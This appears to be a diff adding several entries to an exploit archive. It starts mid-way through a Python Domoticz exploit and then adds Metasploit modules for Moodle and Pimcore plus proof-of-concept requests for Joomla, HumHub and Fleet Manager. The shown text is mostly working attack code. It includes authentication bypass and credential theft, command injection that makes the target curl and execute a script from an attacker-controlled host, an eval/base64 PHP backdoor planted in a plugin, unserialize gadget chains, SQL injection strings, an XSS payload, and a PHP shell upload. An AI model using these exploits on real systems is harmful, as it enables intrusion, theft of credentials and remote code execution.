sid = r.headers['Set-Cookie']
sid = sid[sid.find('SID=')+4 : sid.find(';')]
print '[+] SID=' + sid
return sid
# Search an uvc cam. If exists return its json config
def get_uvc_cam():
r = session.get(url_camjson)
cams = json.loads(r.text)
if cams['status'] == 'OK' and 'result' in cams:
for cam in cams['result']:
if cam['ImageURL']=='uvccapture.cgi':
return cam
return None
# Prompt the user and ask if continue or not
def prompt_msg(msg):
print '[+] WARNING: ' + msg
if not args.f and not raw_input('[+] Continue? [y/N]: ') in ["y","Y"]:
exit(0)
return None
# Embed the commands in a zip icon file (-zipcmd)
def create_zip(commandsline):
zipname = 'iconpackfake.zip'
with zipfile.ZipFile(zipname, 'w') as zip:
zip.writestr('icons.txt', "fakeicon;Button fakeicon;fake")
zip.writestr('fakeicon.png', commandsline)
zip.writestr('fakeicon48_On.png', commandsline)
zip.writestr('fakeicon48_Off.png', commandsline)
return zipname
# HTTP server that reply once with the content of the script
class SingleHandler(BaseHTTPServer.BaseHTTPRequestHandler):
respbody = ""
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(self.respbody)
return None
def log_request(self, code):
pass
#--------------------------------------------------------------------
# INITIALIZATION
#--------------------------------------------------------------------
parser = argparse.ArgumentParser(
description="""Unauthenticated Remote Command Execution on Domoticz!
(version <= 4.10577) Bypass authentication, inject os commands and execute them!""",
epilog="""The default mode (1) insert the commands in a script and reply
with it once to an HTTP request, use -H address and -P port.
The -zipcmd (2) or -direct (3) option override the default mode.""")
parser.add_argument('-noexec', action='store_true', help='no cmd injection, just steal credentials')
parser.add_argument('-zipcmd', action='store_true', help='upload a zip icon pack with commands inside (2)')
parser.add_argument('-direct', action='store_true', help='inject commands directly in uvc params (3)')
parser.add_argument('-H', dest='lhost', type=str, help='address/name of attacker host in default mode (1)')
parser.add_argument('-P', dest='lport', type=int, help='tcp port of attacker host in default mode (1)')
parser.add_argument('-path', dest='path', type=str, default='/src/domoticz',
help='change root path of domoticz to find the uploaded icon(script). Useful only with -zipcmd option')
parser.add_argument('-f', action='store_true', help='shut up and do it')
parser.add_argument('url', metavar='URL', nargs=1, type=str, help='target URL e.g.: http://localhost:8080/')
parser.add_argument('cmd', metavar='cmd', nargs='+', type=str, help='os command to execute, '
'send it in background or do a short job, the domoticz web server will hang during execution')
args = parser.parse_args()
if not(args.direct or args.zipcmd) and (args.lhost is None or args.lport is None):
print '[-] Default mode needs host (-H) and port (-P) of attacker to download the commands'
exit(0)
username = ''
password = ''
cookies = dict()
noauth = True
sqlpref = 'UNION SELECT sValue FROM Preferences WHERE Key="%s" -- '
cmd = args.cmd
url = args.url[0][:-1] if args.url[0][-1]=='/' else args.url[0]
url_sqlinj = url + '/images/floorplans/plan?idx=1 '
url_login = url + '/json.htm?type=command&param=logincheck&username=%s&password=%s&rememberme=true'
url_getconf = url + '/json.htm?type=settings'
url_setconf = url + '/storesettings.webem'
url_iconupl = url + '/uploadcustomicon'
url_camjson = url + '/json.htm?type=cameras'
url_camlive = url + '/camsnapshot.jpg?idx='
url_camadd = url + '/json.htm?type=command&param=addcamera&address=127.0.0.1&port=8080' \
'&name=uvccam&enabled=true&username=&password=&imageurl=dXZjY2FwdHVyZS5jZ2k%3D&protocol=0'
cmd_zipicon = ['chmod 777 %s/www/images/fakeicon48_On.png' % args.path,
'%s/www/images/fakeicon48_On.png' % args.path]
cmd_default = ['curl %s -o /tmp/myexec.sh -m 5', 'chmod 777 /tmp/myexec.sh', '/tmp/myexec.sh']
#--------------------------------------------------------------------
# AUTHENTICATION BYPASS
#--------------------------------------------------------------------
session = requests.Session()
r = session.get(url_getconf)
if r.status_code == 401:
noauth = False
username = steal_dbdata('WebUserName')
password = steal_dbdata('WebPassword')
cookies['SID'] = dologin(username, password)
r = session.get(url_getconf)
if args.noexec is True:
exit(0)
settings = json.loads(r.text)
settings.pop('UVCParams', None)
#--------------------------------------------------------------------
# Fix necessary to not break or lose settings
chn = {'WebTheme':'Themes','UseAutoBackup':'enableautobackup','UseAutoUpdate':'checkforupdates'}
for k in chn:
settings[chn[k]] = settings.pop(k, None)
sub = settings.pop('MyDomoticzSubsystems', 0)
if sub >= 4:
settings['SubsystemApps'] = 4; sub -= 4
if sub >= 2:
settings['SubsystemShared'] = 2; sub -= 2
if sub == 1:
settings['SubsystemHttp'] = 1
try:
settings['HTTPURL'] = base64.b64decode(settings['HTTPURL'])
settings['HTTPPostContentType'] = base64.b64decode(settings['HTTPPostContentType'])
settings['Latitude'] = settings['Location']['Latitude']
settings['Longitude'] = settings['Location']['Longitude']
settings.pop('Location', None)
except:
pass
toOn = ['allow','accept','hide','enable','disable','trigger','animate','show']
toOn += ['usee','floorplanfullscreen','senderrorsasn','emailasa','checkforupdates']
for k in [x for x in settings if any([y for y in toOn if y in x.lower()])]:
if(str(settings[k]) == '1'):
settings[k] = 'on'
elif(str(settings[k]) == '0'):
settings.pop(k, None)
#--------------------------------------------------------------------
# COMMAND INJECTION
#--------------------------------------------------------------------
cmdwrap = '\n'.join(['#!/bin/bash'] + cmd)
payload = urllib.urlencode(settings) + '&'
if cmd[-1][-1] != '&' and not args.direct:
prompt_msg('if not sent in background the commands may block domoticz')
if args.direct:
prompt_msg('in direct mode & pipe redirect are not allowed (may block domoticz)')
elif args.zipcmd:
fakezip = create_zip(cmdwrap)
files = [('file',(fakezip, open(fakezip,'rb'), 'application/zip'))]
r = session.post(url_iconupl, files=files)
cmd = cmd_zipicon
else:
httpd = BaseHTTPServer.HTTPServer(("", args.lport), SingleHandler)
SingleHandler.respbody = cmdwrap
thread.start_new_thread(httpd.handle_request, ())
cmd_default[0] = cmd_default[0] % ('http://%s:%d/' % (args.lhost,args.lport))
cmd = cmd_default
# Encode the space and send the others in clear (chars like <>&;| not allowed)
cmdencode = '\n'.join([x.replace(' ', '+') for x in cmd])
payload += 'UVCParams=-d+/dev/aaa\n%s\n#' % (cmdencode)
req = requests.Request('POST', url_setconf, data=payload, cookies=cookies)
r = session.send(req.prepare())
print '[+] Commands successfully injected'
#--------------------------------------------------------------------
# COMMAND EXECUTION
#--------------------------------------------------------------------
if noauth:
session.cookies.clear() # fix if authentication is disabled
cam = get_uvc_cam()
if cam is None:
print '[+] Adding new UVC camera'
r = session.get(url_camadd)
cam = get_uvc_cam()
print '[+] Execution on cam with idx: ' + str(cam['idx'])
r = session.get(url_camlive + str(cam['idx']))
# Restore the default UVC parameters (like a ninja)
settings['UVCParams'] = '-S80 -B128 -C128 -G80 -x800 -y600 -q100'
session.post(url_setconf, data=settings)
print '[+] Done! Restored default uvc params!'

223
exploits/php/remote/46775.rb Executable file
View file

@ -0,0 +1,223 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Moodle 3.6.3 - 'Install Plugin' Remote Command Execution",
'Description' => %q(
This module exploits a command execution vulnerability in Moodle 3.6.3.
An attacker can upload malicious file using the plugin installation area.
Plugins must be hosted accommodate "version.php" and "theme_{plugin name}.php" files.
After routine check, the moodle will accept the appropriate plugin file.
Plugin control can be bypassed and malicious code can be placed in the files contained in the plugin.
The module receives a shell session from the server by placing malicious code in the language file.
You must have an admin account to exploit this vulnerability.
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
],
'References' =>
[
['URL', 'http://pentest.com.tr/exploits/Moodle-3-6-3-Install-Plugin-Remote-Command-Execution.html'],
['URL', 'https://moodle.org']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Apr 28 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Base Moodle directory path", '/']),
OptString.new('USERNAME', [true, "Admin username to authenticate with", 'admin']),
OptString.new('PASSWORD', [false, "Admin password to authenticate with", 'admin'])
]
)
end
def create_plugin_file
# There are syntax errors in creating zip file. So the payload was sent as base64.
plugin_file = Rex::Zip::Archive.new
@header = Rex::Text.rand_text_alpha_upper(4)
@plugin_name = Rex::Text.rand_text_alpha_lower(7)
path = "#{@plugin_name}/version.php"
path2 = "#{@plugin_name}/lang/en/theme_#{@plugin_name}.php"
# "$plugin->version" and "$plugin->component" contents are required to accept Moodle plugin.
plugin_file.add_file(path, "<?php $plugin->version = 2018121704; $plugin->component = 'theme_#{@plugin_name}';")
plugin_file.add_file(path2, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
plugin_file.pack
end
def exec_code(cookie)
handler
# Base64 was encoded in "PHP". This process was sent as "HTTP headers".
send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, "theme", @plugin_name, "lang", "en", "theme_#{@plugin_name}.php"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
})
end
def upload(cookie)
# The beginning of the adventure o_O
print_status("Plugin zip file is being created and loaded...")
res = send_request_cgi(
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, 'admin', 'tool', 'installaddon', 'index.php')
)
@sesskey = res.body.split('"sesskey":"')[1].split('"')[0] # fetch session info
@itemid = res.body.split('amp;itemid=')[1].split('&')[0] # fetch item for upload
@author = res.body.split('title="View profile">')[1].split('<')[0] # fetch admin account profile info
@clientid = res.body.split('client_id":"')[1].split('"')[0] # fetch client info
# creating multipart data for the upload plugin file
pdata = Rex::MIME::Message.new
pdata.add_part(create_plugin_file, 'application/zip', nil, "form-data; name=\"repo_upload_file\"; filename=\"#{@plugin_name}.zip\"")
pdata.add_part('', nil, nil, 'form-data; name="title"')
pdata.add_part(@author, nil, nil, 'form-data; name="author"')
pdata.add_part('allrightsreserved', nil, nil, 'form-data; name="license"')
pdata.add_part(@itemid, nil, nil, 'form-data; name="itemid"')
pdata.add_part('.zip', nil, nil, 'form-data; name="accepted_types[]"')
pdata.add_part('4', nil, nil, 'form-data; name="repo_id"')
pdata.add_part('', nil, nil, 'form-data; name="p"')
pdata.add_part('', nil, nil, 'form-data; name="page"')
pdata.add_part('filepicker', nil, nil, 'form-data; name="env"')
pdata.add_part(@sesskey, nil, nil, 'form-data; name="sesskey"')
pdata.add_part(@clientid, nil, nil, 'form-data; name="client_id"')
pdata.add_part('-1', nil, nil, 'form-data; name="maxbytes"')
pdata.add_part('-1', nil, nil, 'form-data; name="areamaxbytes"')
pdata.add_part('1', nil, nil, 'form-data; name="ctx_id"')
pdata.add_part('/', nil, nil, 'form-data; name="savepath"')
data = pdata.to_s
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, 'repository', 'repository_ajax.php?action=upload')
})
if res.body =~ /draftfile.php/
print_good("Plugin #{@plugin_name}.zip file successfully uploaded to target!")
print_status("Attempting to integrate the plugin...")
@zipfile = res.body.split('draft\/')[1].split('\/')[0]
plugin_integration(cookie)
else
fail_with(Failure::NoAccess, "Something went wrong!")
end
end
def plugin_integration(cookie)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'tool', 'installaddon', 'index.php'),
'cookie' => cookie,
'vars_post' => {
'sesskey' => @sesskey,
'_qf__tool_installaddon_installfromzip_form' => '1',
'mform_showmore_id_general' => '0',
'mform_isexpanded_id_general' => '1',
'zipfile' => @zipfile,
'plugintype' => 'theme',
'rootdir' => '',
'submitbutton' => 'Install+plugin+from+the+ZIP+file'
}
)
if res.body =~ /installzipstorage/
print_good("Plugin successfully integrated!")
storage = res.body.split('installzipstorage=')[1].split('&')[0]
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'tool', 'installaddon', 'index.php'),
'cookie' => cookie,
'vars_post' => {
'installzipcomponent' => "theme_#{@plugin_name}",
'installzipstorage' => storage,
'installzipconfirm' => '1',
'sesskey' => @sesskey
}
)
exec_code(cookie)
else
fail_with(Failure::NoAccess, "Something went wrong!")
end
end
def login(uname, pass)
# 1st request to get MoodleSession and LoginToken
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login', 'index.php')
)
cookie = res.get_cookies
token = res.body.split('logintoken" value="')[1].split('"')[0]
# 2nd request to login validation
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login', 'index.php'),
'cookie' => cookie,
'vars_post' => {
'anchor' => '',
'logintoken' => token,
'username' => uname,
'password' => pass
}
)
cookie = res.get_cookies
location = res.redirection.to_s
if res and res.code = 303 && location.include?('testsession')
return cookie
end
fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
return nil
end
def check
# Basic check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'lib', 'upgrade.txt')
)
if res && res.code == 200 && res.body =~ /=== 3.7/
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end
def exploit
cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
print_good("Authentication was successful with user: #{datastore['USERNAME']}")
upload(cookie) # start the adventure
end
##
# The end of the adventure (o_O) // AkkuS
##
end

273
exploits/php/remote/46783.rb Executable file
View file

@ -0,0 +1,273 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => "Pimcore Unserialize RCE",
'Description' => %q(
This module exploits a PHP unserialize() in Pimcore before 5.7.1 to
execute arbitrary code. An authenticated user with "classes" permission
could exploit the vulnerability.
The vulnerability exists in the "ClassController.php" class, where the
"bulk-commit" method makes it possible to exploit the unserialize function
when passing untrusted values in "data" parameter.
Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony
unserialize payload.
Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniele Scanu', # Discovery & PoC
'Fabio Cogno' # Metasploit module
],
'References' =>
[
['CVE', '2019-10867'],
['URL', 'https://github.com/pimcore/pimcore/commit/38a29e2f4f5f060a73974626952501cee05fda73'],
['URL', 'https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['Pimcore 5.x (Symfony unserialize payload)', 'type' => :symfony],
['Pimcore 4.x (Zend unserialize payload)', 'type' => :zend]
],
'Payload' => {
'Space' => 8000,
'DisableNops' => true
},
'Privileged' => false,
'DisclosureDate' => "Mar 11 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Base Pimcore directory path", '/']),
OptString.new('USERNAME', [true, "Username to authenticate with", '']),
OptString.new('PASSWORD', [false, "Password to authenticate with", ''])
]
)
end
def login
# Try to login
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'login', 'login'),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code == 302 && res.headers['Location'] =~ /\/admin\/\?_dc=/
print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
# Grabbing CSRF token and PHPSESSID cookie
return grab_csrftoken(res)
end
if res.code == 302 && res.headers['Location'] =~ /auth_failed=true/
fail_with(Failure::NoAccess, 'Invalid credentials')
end
fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
end
def grab_csrftoken(auth_res)
uri = "#{target_uri.path}admin/?_dc=#{auth_res.headers['Location'].scan(/\/admin\/\?_dc=([0-9]+)/).flatten.first}"
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(uri),
'cookie' => auth_res.get_cookies
)
if res && res.code == 200
# Pimcore 5.x
unless res.body.scan(/"csrfToken": "[a-z0-9]+",/).empty?
@csrf_token = res.body.scan(/"csrfToken": "([a-z0-9]+)",/).flatten.first.to_s
@pimcore_cookies = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0]
fail_with(Failure::NotFound, 'Failed to retrieve cookies') unless @pimcore_cookies
@pimcore_cookies << " pimcore_admin_sid=1;"
# Version
version = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[0]
build = res.body.scan(/"pimcore platform \(v([0-9]{1}\.[0-9]{1}\.[0-9]{1})\|([a-z0-9]+)\)"/i).flatten[1]
fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build
print_version(version, build)
return assign_target(version)
end
# Pimcore 4.x
unless res.body.scan(/csrfToken: "[a-z0-9]+",/).empty?
@csrf_token = res.body.scan(/csrfToken: "([a-z0-9]+)",/).flatten.first.to_s
@pimcore_cookies = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]
fail_with(Failure::NotFound, 'Unable to retrieve cookies') unless @pimcore_cookies
# Version
version = res.body.scan(/version: "([0-9]{1}\.[0-9]{1}\.[0-9]{1})",/i).flatten[0]
build = res.body.scan(/build: "([0-9]+)",/i).flatten[0]
fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build
print_version(version, build)
return assign_target(version)
end
# Version different from 4.x or 5.x
return nil
else
fail_with(Failure::NoAccess, 'Failed to grab csrfToken and PHPSESSID')
end
end
def print_version(version, build)
print_status("Pimcore version: #{version}")
print_status("Pimcore build: #{build}")
end
def assign_target(version)
if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6')
print_good("The target is vulnerable!")
return targets[0]
elsif Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5')
print_good("The target is vulnerable!")
return targets[1]
else
print_error("The target is NOT vulnerable!")
return nil
end
end
def upload
# JSON file payload
fpayload = "{\"customlayout\":[{\"creationDate\": \"#{rand(1..9)}\", \"modificationDate\": \"#{rand(1..9)}\", \"userOwner\": \"#{rand(1..9)}\", \"userModification\": \"#{rand(1..9)}\"}]}"
# construct POST data
data = Rex::MIME::Message.new
data.add_part(fpayload, 'application/json', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
# send JSON file payload to bulk-import function
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'class', 'bulk-import'),
'vars_get' => { 'csrfToken' => @csrf_token },
'cookie' => @pimcore_cookies,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
if res.code == 200
json = res.get_json_document
if json['success'] == true
print_good("JSON payload uploaded successfully: #{json['filename']}")
return json['filename']
else
print_warning('Could not determine JSON payload file upload')
return nil
end
end
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'login')
)
unless res
return Exploit::CheckCode::Unknown
end
if res.code == 200 && res.headers =~ /pimcore/i || res.body =~ /pimcore/i
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Unknown
end
def exploit
# Try to log in, grab csrfToken and select target
my_target = login
if my_target.nil?
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
# Try to upload JSON payload file
fname = upload
unless fname.nil?
# Register uploaded JSON payload file for cleanup
register_files_for_cleanup(fname)
end
print_status("Selected payload: #{my_target.name}")
case my_target['type']
when :symfony
# The payload to execute
spayload = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
# The Symfony object payload
serialize = "O:43:\"Symfony\\Component\\Cache\\Adapter\\ApcuAdapter\":3:{"
serialize << "s:64:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00mergeByLifetime\";"
serialize << "s:9:\"proc_open\";"
serialize << "s:58:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00namespace\";a:0:{}"
serialize << "s:57:\"\x00Symfony\\Component\\Cache\\Adapter\\AbstractAdapter\x00deferred\";"
serialize << "s:#{spayload.length}:\"#{spayload}\";}"
when :zend
# The payload to execute
spayload = "eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"
# The Zend1 object payload
serialize = "a:2:{i:7;O:8:\"Zend_Log\":1:{s:11:\"\x00*\x00_writers\";a:1:{"
serialize << "i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\x00*\00_eventsToMail\";a:1:{"
serialize << "i:0;i:1;}s:22:\"\x00*\x00_layoutEventsToMail\";a:0:{}s:8:\"\00*\x00_mail\";"
serialize << "O:9:\"Zend_Mail\":0:{}s:10:\"\x00*\x00_layout\";O:11:\"Zend_Layout\":3:{"
serialize << "s:13:\"\x00*\x00_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{"
serialize << "s:16:\"\x00*\x00_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\x00*\x00_replacement\";"
serialize << "S:#{spayload.length}:\"#{spayload}\";}"
serialize << "s:20:\"\x00*\x00_inflectorEnabled\";b:1;s:10:\"\x00*\x00_layout\";"
serialize << "s:6:\"layout\";}s:22:\"\x00*\x00_subjectPrependText\";N;}}};i:7;i:7;}"
end
# send serialized payload
send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'admin', 'class', 'bulk-commit'),
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
'cookie' => @pimcore_cookies,
'vars_post' => {
'filename' => fname,
'data' => JSON.generate(
'type' => 'customlayout',
'name' => serialize
)
},
'headers' => {
'X-pimcore-csrf-token' => @csrf_token
}
}, 30
)
end
end

14
exploits/php/webapps/46769.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: Joomla! Component ARI Quiz 3.7.4 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: April 27, 2019
# Vendor Homepage: http://www.ari-soft.com
# Software Link : https://extensions.joomla.org/extensions/extension/living/education-a-culture/ari-quiz/
# Tested Version: 3.7.4
# Tested on: Kali linux, Windows 8.1
# PoC:
# http://localhost/[PATH]/index.php?option=com_ariquiz&view=category&categoryId=SQLi&Itemid=236
# http://localhost/[PATH]/index.php?option=com_ariquiz&view=category&categoryId=6%27and%200%20union%20select%201,2,3--%20-&Itemid=236

39
exploits/php/webapps/46771.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: HumHub 1.3.12 - Cross-Site Scripting
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://humhub.org/
# Version: 1.3.12
# CVE : CVE-2019-11564
Url : http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
Vulnerable File :
/protected/vendor/codeception/codeception/tests/data/app/view/index.php
Request Type: POST
#Request Example:
=============
POST /humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Connection: close
Cookie: xxxx
Upgrade-Insecure-Requests: 1
%3Cscript%3Ealert%28%22Vulnerable%22%29%3C%2Fscript%3E=undefined
### History
=============
2019-4-10 Issue discovered
2019-4-10 Vendor contacted
2019-4-10 Vendor response and hotfix
2019-4-27 Advisory release

40
exploits/php/webapps/46774.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Joomla! Component JiFile 2.3.1 - Arbitrary File Download
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: April 28, 2019
# Vendor Homepage: http://www.isapp.it
# Software Link : https://extensions.joomla.org/extensions/extension/search-a-indexing/site-search/jifile/
# Dork: inurl:index.php?option=com_jifile
# Tested Version: 2.3.1
# Tested on: Kali linux, Windows 8.1
# PoC:
GET /web/index.php?option=com_jifile&task=filesystem.download&filename=index.php HTTP/1.1 <== YOUR FILE HERE
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 7a9abe45881a5cc968ac0e7c857d8a72=6a377b3429e0b0c22c3abb8f3a078534
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 28 Apr 2019 17:37:16 GMT
Server: Apache
Pragma: public
Cache-Control: must-revalidate, post-check=0, pre-check=0
Expires: 0
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename="index.php"; modification-date="1418190008"; size=1319;
Set-Cookie: c90ff18cda17f7cf5069ad1e830756c6=9a1f1c7e9bc241c66e7ad65ca0dd7624; path=/; secure
Content-Length: 1319
Connection: close
Content-Type: application/x-php
FILE_CONTENT

122
exploits/php/webapps/46776.txt Normal file
View file

@ -0,0 +1,122 @@
========================================================================================
| Fleet Manager hyvikk Shell Upload
# Date: 29-04-2019
# Title : Fleet Manager by hyvikk All versions
| # Author : saxgy1331 - Kaieteur-Falls-1331
| # Vendor Homepage: https://codecanyon.net/item/fleet-manager/20051839
| # Tested on: Windows, Linux
| # Bug : Shell upload
====================== =================================
# Exploit :
You can upload a php shell file as a vehicle image
http://localhost/delivery/public/vehicles/create
After uploading the image you the shell will be saved in the /uploads/ folder with the id code
go http://localhost/delivery/public/vehicles/ right click on the recent "php shell photo" you have uploaded Boom!
POST /good/vehicles HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/good/vehicles/create
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 1926
Connection: keep-alive
Cookie: PHPSESSID= ; XSRF-TOKEN= %3D%3D; laravel_session=
Upgrade-Insecure-Requests: 1
-----------------------------191691572411478
Content-Disposition: form-data; name="_token"
9gGkjP2AeqfijIpC6hH7TSxGDS7RAoily8pEdM9R
-----------------------------191691572411478
Content-Disposition: form-data; name="user_id"
1
-----------------------------191691572411478
Content-Disposition: form-data; name="make"
test1234
-----------------------------191691572411478
Content-Disposition: form-data; name="model"
test12345
-----------------------------191691572411478
Content-Disposition: form-data; name="type"
Hatchback
-----------------------------191691572411478
Content-Disposition: form-data; name="year"
5
-----------------------------191691572411478
Content-Disposition: form-data; name="int_mileage"
3
-----------------------------191691572411478
Content-Disposition: form-data; name="vehicle_image"; filename="1331.php"
Content-Type: application/octet-stream
<?php
echo "1331";
?>
-----------------------------191691572411478
Content-Disposition: form-data; name="reg_exp_date"
2019-04-24
-----------------------------191691572411478
Content-Disposition: form-data; name="in_service"
1
-----------------------------191691572411478
Content-Disposition: form-data; name="engine_type"
Petrol
-----------------------------191691572411478
Content-Disposition: form-data; name="horse_power"
1
-----------------------------191691572411478
Content-Disposition: form-data; name="color"
green
-----------------------------191691572411478
Content-Disposition: form-data; name="vin"
1
-----------------------------191691572411478
Content-Disposition: form-data; name="license_plate"
1331
-----------------------------191691572411478
Content-Disposition: form-data; name="lic_exp_date"
2019-04-23
-----------------------------191691572411478
Content-Disposition: form-data; name="group_id"
1
-----------------------------191691572411478--
Example
http://localhost/delivery/public/uploads/122030d1-ba55-4bfe-9533-44955d47b433.php
Fix
public function uploadPhoto(Request $request)
{
$this->validate($request, [
'photo' => 'mimes:jpeg,png,bmp,tiff |max:4096',
],
$messages = [
'required' => 'The :attribute field is required.',
'mimes' => 'Only jpeg, png, bmp,tiff are allowed.'
]
);
// Now save your file to the storage and file details at database.
}

33
exploits/php/webapps/46777.txt Normal file
View file

@ -0,0 +1,33 @@
################################
# Exploit Title: Agent Tesla Botnet - Information Disclosure Disclosure Vulnerability
# Google Dork: n/a
# Date: 26/11/2018
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: http://www.agenttesla.com/ ¡ Down !
# Version: unkn0wn
# Tested on: Windows 10, debian 7
# CVE : n/a
# Greetz: Shell.root, Griever, Telibles
################################
# Vuln-Code: http://127.0.0.1/WebPanel/server_side/scripts/server_processing.php
$table = $_GET['table'];
// Table's primary key
$primaryKey = $_GET['primary'];
if(isset($_GET['where'])){
$where = base64_decode($_GET['where']);
}else{
$where = "";
}
$idArray = unserialize(urldecode($_GET['clmns']));
################################
PoC Extract full passwords:
